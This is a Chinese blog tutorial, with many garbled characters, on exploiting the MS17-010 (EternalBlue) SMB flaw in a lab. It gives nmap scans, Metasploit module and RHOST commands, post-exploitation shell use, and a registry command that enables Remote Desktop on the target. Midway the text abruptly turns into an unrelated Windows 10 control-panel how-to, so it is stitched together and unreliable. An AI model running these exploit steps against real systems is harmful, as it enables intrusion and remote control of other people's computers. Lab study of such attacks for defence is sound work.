免責聲明
由于傳播��、利用本頭條俊杰說黑客所提供的信息而造成的任何直接或者間接的后果及損失�,均由使用者本人負責,俊杰說黑客不為此承擔任何責任��,一旦造成后果請自行承擔�!
引言
永恒之藍介紹
永恒之藍是指2017年4月14日晚,黑客團體Shadow Brokers(影子經(jīng)紀人)公布一大批網(wǎng)絡攻擊工具�,其中包含“永恒之藍”工具���,
“永恒之藍”利用Windows系統(tǒng)的SMB漏洞可以獲取系統(tǒng)最高權限�。
漏洞介紹
漏洞編號:MS17-010�,CVE-2017-0143/0144/0145/0146/0147/0148
漏洞類型:緩沖區(qū)溢出漏洞
漏洞影響:Windows Vista SP2; Windows Server 2008 SP2 and R2 SP1; Windows 7 SP1; Windows 8.1; Windows Server 2012 Gold and R2; Windows RT 8.1; and Windows 10 Gold, 1511, and 1607; Windows Server 2016
什么是SMB協(xié)議
SMB(Server Message Block)協(xié)議是一種用于在計算機網(wǎng)絡上共享文件、打印機和其他資源的通信協(xié)議��。它最初由IBM開發(fā)��,后來被微軟采用并集成到Windows操作系統(tǒng)中��。SMB協(xié)議允許計算機之間共享文件和打印機,以及訪問遠程計算機上的共享資源�����。SMB協(xié)議還提供了一些安全功能���,例如身份驗證和加密�����,以保護共享資源不被未經(jīng)授權的用戶訪問。SMB協(xié)議是現(xiàn)代計算機網(wǎng)絡中最常用的文件共享協(xié)議之一�。
SMB協(xié)議的工作原理
客戶端向服務器發(fā)送一個請求�,請求訪問共享資源����。服務器收到請求后,會驗證客戶端的身份和權限,如果驗證通過,則會向客戶端發(fā)送一個會話消息�,建立一個會話客戶端和服務器之間的會話建立后�����,客戶端可以向服務器發(fā)送各種請求,如讀取、寫入���、刪除文件等。服務器接收到請求后,會執(zhí)行相應的操作����,并將結果返回給客戶端�。當客戶端不再需要訪問共享資源時�,它會向服務器發(fā)送一個關閉會話的請求,服務器會關閉會話并釋放資源。另外:SMB協(xié)議支持多種傳輸協(xié)議�����,如TCP/IP��、NetBEUI等���,可以在局域網(wǎng)��、廣域網(wǎng)和互聯(lián)網(wǎng)上使用。它還支持加密和數(shù)字簽名等安全機制��,以保護數(shù)據(jù)的安全性�。
實驗環(huán)境準備
1、Vmware虛擬機�,用于搭建實驗環(huán)境
2��、kali linux攻擊機 https://www.kali.org/get-kali/#kali-virtual-machines
3、Win7 x64靶機
4���、關閉靶機的防火墻以及殺毒軟件
注:使用kali作為攻擊機,windows7(旗艦版)作為靶機,靶機IP地址未知,但kali和靶機均在同一個網(wǎng)段���,可ping通,另外需檢查是否已經(jīng)有安全更新補丁(登錄Nessus,對靶機系統(tǒng)進行掃描即可)
實驗開始
查看靶機和攻擊機ip地址及子網(wǎng)掩碼
靶機ip地址
攻擊機ip地址
使用nmap工具對該網(wǎng)段進行局域網(wǎng)存活主機掃描探測
在上面的ipconfig中已經(jīng)知道了網(wǎng)段為(.110網(wǎng)段)�,對該網(wǎng)段進行探測
nmap -sP 192.168.110.0/24
使用nmap對ip地址進行掃描查看開放端口
如上圖所示的查詢結果��,其中可以看見靶機的445端口是開啟的狀態(tài),因此可以進行下一步操作
打開MSF
使用msfconsole進入msf框架,此框架為kail自帶���,可以直接進行查找MS17-010****永恒之藍的組件,此界面每次都會有可能不一樣,只要看見msf6即可
開車上高速了
使用search搜索搜索ms17_010
以上其中auxil iary/ scanner/ smb/ smb/ms17010為掃描模塊�,用于對目標是否存在永恒之藍漏洞進行確認
exploit /wi ndows/ smb/ms17 010 eternalblue為攻擊模塊�����,用于對存在永恒之藍漏洞的目標進行攻擊
use auxil iary/ scanner/ smb/ smb/ms17010
使用模塊進行分析并攻擊
在上述這些中只需要知道兩個命令:RHOSTS和THREADS,RHOSTS是要掃描的主機(主機段)��,THREADS是線程���,默認是1�,開始使用線程加快掃描。
設置攻擊地址并run運行
set RHOST 目標IP地址
在上文中提到了登錄Nessus�����,對靶機系統(tǒng)進行掃描即可知道是否存在MS17-010漏洞�����,在這里設置完ip后run也可以得知攻擊的靶機是否存在永恒之藍漏洞
設置攻擊載荷,playload設置有很多種不同的版本�����,在這里直接套用即可
設置攻擊機ip并開始最后運行
使用payload進行攻擊:
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 192.168.110.237
run或exploit
設置完攻擊機ip地址后使用exploit進行運行攻擊����,最后顯示W(wǎng)IN即攻擊成功
攻擊成功后演示
最后使用help即可查看你可以進行的操作,包括新建用戶���,打開攝像頭,遠程截圖等等
shell獲取控制臺 就是WIN 的CMD
然后在查看當前用戶:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
永恒之藍(特幣勒索病毒)之后,很多用戶機智的把電腦升級到Win10���,卻發(fā)現(xiàn)開始菜單中的控制面板不見了���,一臉懵啊���,那么���,Win10創(chuàng)意者的控制面板在哪呢��?我們要如何打開Win10創(chuàng)意者的控制面板呢���?其實Win10創(chuàng)意者的控制面板依然健在���,為了方便使用�,我們可以將控制面板移到桌面或開始屏幕中����,下面我們來看看具體的操作方法。
圖1
Win10創(chuàng)意者控制面板在哪����?
1���、在Win10創(chuàng)意者更新版中�,點擊左下角的開始菜單按鈕����;
圖2
2、在彈出的菜單中找到Windows系統(tǒng)菜單項;
圖3
3��、展開Windows系統(tǒng)菜單項后�����,可以看到控制面板菜單,Win10創(chuàng)意者更新后,控制面板在該菜單下了。
圖4
Win10創(chuàng)意者控制面板怎么添加到開始屏幕或桌面?
1��、我們可以直接在系統(tǒng)小娜的搜索框中輸入“控制面板”關鍵詞��,這時就可以搜索到控制面板了���。
圖5
2��、我們可以在搜索結果中右鍵點擊“控制面板”項,在彈出菜單中選擇“固定到開始屏幕。
圖6
3����、這時就可以在開始菜單中看到控制面板的身影了哦�,是不是與原來的Win7開始菜單差不多了啊��。
圖7
4�����、我們也可以把控制面板放到桌面上,只需要按下鼠標左鍵拖動控制面板圖標���,把其拉到桌面空白處放手就可以了。
圖8
5���、到Win10桌面后,就可以看到剛剛添加上的控制面板的快捷方式���,雙擊該圖標就可以打開控制面板了哦。
圖9
Win10創(chuàng)意者控制面板怎么顯示到桌面����?
1�、在Win10系統(tǒng)桌面空白處點擊右鍵�,然后在彈出菜單中選擇”個性化“菜單項;
圖10
2、在打開的設置窗口中���,點擊左側的“主題”側邊欄����,然后在右側窗口中找到“桌面圖標設置”的快捷鏈接并點擊該鏈接。
圖11
3���、這時會打開“桌面圖標設置”窗口�,在這里選中“控制面板”前的復選框����,最后點擊確定按鈕。
圖12
4��、同樣會把控制面板添加到桌面上哦���。
圖13
不知道Win10創(chuàng)意者控制面板在哪���?不知道Win10創(chuàng)意者控制面板怎么打開����?趕緊看看以上教程吧!上述教程 就是給大家講解了將Win10創(chuàng)意者控制面板添加到桌面或開始屏幕的操作技巧�。
